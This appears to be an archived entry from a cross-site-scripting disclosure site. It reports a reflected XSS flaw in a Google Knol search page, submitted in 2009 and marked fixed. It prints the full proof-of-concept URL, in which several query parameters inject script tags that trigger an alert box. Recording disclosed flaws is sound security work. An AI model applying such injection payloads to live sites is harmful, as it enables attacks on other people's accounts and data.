Security researcher Azat Harutyunyan, has submitted on 06/05/2009 a cross-site-scripting (XSS) vulnerability affecting knol.google.com, which at the time of submission ranked 1 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/05/2009. It is currently fixed.
Date submitted: 06/05/2009 Date published: 06/05/2009 Date fixed: 02/12/2009Status:  FIXED
Author: Azat Harutyunyan Domain: knol.google.com Category: XSS Pagerank: 1
URL: http://knol.google.com/k/knol/system/knol/pages/SearchToolkit?show=off&q=%3E%3Cscript%3Ealert(/xss/)
%3C/script%3E&qexact=&qor1=%3E%3Cscript%3Ealert(/xss%20by%20azat/)%3C/script%3E&qor2=%3E%3Cscript%3E
alert(/xss%20by%20azat/)%3C/script%3E&qor3=&qneg=&doctype=0&loc0=on&loc1=on&loc3=on&loc4=on&loc5=on&
loc7=on&restrict=3&url=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&editdate=0&createdate=0&language=0&l
icense=0&collab=0&link=%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&templateUrl=%3E%3Cscript%3Ealert(/xs
s/)%3C/script%3E&promo=&sort=0&num=10
Click here to view the mirror
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.